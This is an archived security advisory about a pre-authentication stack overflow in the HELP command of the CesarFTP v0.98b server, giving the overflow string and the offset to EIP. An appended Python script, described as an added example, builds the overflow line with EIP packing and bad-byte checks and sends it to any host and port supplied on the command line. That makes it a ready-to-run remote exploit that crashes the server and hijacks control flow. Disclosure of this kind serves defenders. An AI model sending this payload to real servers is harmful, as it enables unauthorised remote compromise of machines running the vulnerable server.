DESCRIPTION

CesarFTP v0.98b is vulnerable to a stack-based buffer overflow when the HELP command is sent followed by a very long argument.

Example: sending the following perl string

  "HELP " . ("A" x 1978) . "CCCC\x00\x0D\x0A"

overwrites the saved return address in SERVER.EXE, so execution resumes with EIP = 0x43434343 ("CCCC"). The 1978 filler bytes are the distance from the start of the HELP argument to the saved EIP; the four bytes that follow are what EIP is loaded with.

Because HELP is accepted before login, an unauthenticated remote attacker can compromise the win9x/NT/2k system running the server.

The only tricky part in writing an exploit is that SERVER.EXE does not have LoadLibraryA and GetProcAddress in its import table, so shellcode cannot resolve arbitrary APIs the usual way. There are, however, enough other imported functions to take over the computer (registry functions, CreateDirectoryA, CreateFileA, ReadFile, WriteFile, ShellExecuteA, ...).

I have not written an exploit and probably I never will :)

VENDOR STATUS

I have sent this advisory to <cesarftpat_private>

greetz,
[ByteRage] <byterageat_private>
byterage.cjb.net
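The following Python script is an added example and is not part of the original advisory or the CesarFTP project. It builds the HELP line with the layout the advisory describes (5-byte command, 1978 filler bytes, 4-byte EIP overwrite, then NUL CR LF), checks that neither the filler nor the chosen EIP value contains a byte that would end the command line or the copy early (0x00, 0x0D, 0x0A are assumed to be the bad bytes; the original perl string places the NUL and CRLF only after the overwrite value), and lets you read back the EIP value a crash should report so the offset can be confirmed against the debugger. The connection helper assumes the server sends a 220 greeting on connect; the host and port are whatever you point it at.

```python
import socket
import struct

# Layout reported by the advisory: "HELP " + 1978 filler bytes, then the
# four bytes that land in EIP, then NUL CR LF.
COMMAND = b"HELP "
EIP_OFFSET = 1978          # filler bytes between "HELP " and the saved EIP
TAIL = b"\x00\x0D\x0A"     # taken from the advisory's perl string
# Assumed bad bytes: each would terminate the command line (CR/LF) or the
# string copy (NUL) before the saved return address is reached.
BAD_CHARS = frozenset({0x00, 0x0A, 0x0D})


def build_help_overflow(eip_value, offset=EIP_OFFSET, filler=b"A"):
    """Return the raw HELP line that overwrites the saved return address.

    eip_value is packed little-endian, as the x86 stack stores it. The
    advisory's "CCCC" (0x43434343) is byte-order symmetric, so the original
    test string does not show this, but any real address would.
    """
    packed = struct.pack("<I", eip_value)
    for b in packed:
        if b in BAD_CHARS:
            raise ValueError(f"EIP value {eip_value:#010x} contains bad byte {b:#04x}")
    if any(b in BAD_CHARS for b in filler):
        raise ValueError("filler contains a line- or string-terminating byte")
    pad = (filler * (offset // len(filler) + 1))[:offset]
    return COMMAND + pad + packed + TAIL


def eip_from_payload(payload, offset=EIP_OFFSET):
    """Value a crash should report in EIP if the offset is right.

    Compare this against the faulting EIP shown by the debugger; a match
    confirms the 1978-byte distance for this build of SERVER.EXE.
    """
    start = len(COMMAND) + offset
    return struct.unpack("<I", payload[start:start + 4])[0]


def send_payload(host, port, payload, timeout=5.0):
    """Deliver the line on the FTP control connection before any login.

    Reads the greeting first so the command is not sent before the server
    is ready (assumes a 220 banner); HELP needs no authentication.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024)
        s.sendall(payload)
        try:
            return banner, s.recv(1024)   # usually empty once the server has crashed
        except (socket.timeout, ConnectionError):
            return banner, b""


if __name__ == "__main__":
    import sys
    crash = build_help_overflow(0x43434343)   # reproduces the advisory's test case
    if len(sys.argv) == 3:
        print(send_payload(sys.argv[1], int(sys.argv[2]), crash))
    else:
        print(f"payload is {len(crash)} bytes; usage: {sys.argv[0]} HOST PORT")
```

With the advisory's value the script produces exactly the 1990-byte line shown above; substituting another address shows why the little-endian packing and the bad-byte check matter, since a value such as 0x41410a41 cannot be delivered this way at all.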
This archive was generated by hypermail 2b30 : Sun Jul 01 2001 - 23:04:39 PDT